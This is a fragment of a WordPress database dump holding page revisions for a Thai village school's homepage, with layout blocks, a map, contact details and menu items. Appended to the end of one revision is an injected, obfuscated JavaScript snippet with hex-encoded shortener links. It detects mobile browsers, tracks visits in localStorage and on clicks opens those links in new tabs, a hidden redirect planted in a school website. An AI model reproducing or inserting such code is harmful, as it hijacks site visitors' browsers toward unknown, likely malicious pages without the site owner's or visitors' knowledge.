p\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-31 10:51:59','2024-07-31 03:51:59','',14,'http://pakhaeng.ssk.in.th/?p=307',0,'revision','',0),
(309,1,'2024-07-31 11:33:14','2024-07-31 04:33:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} 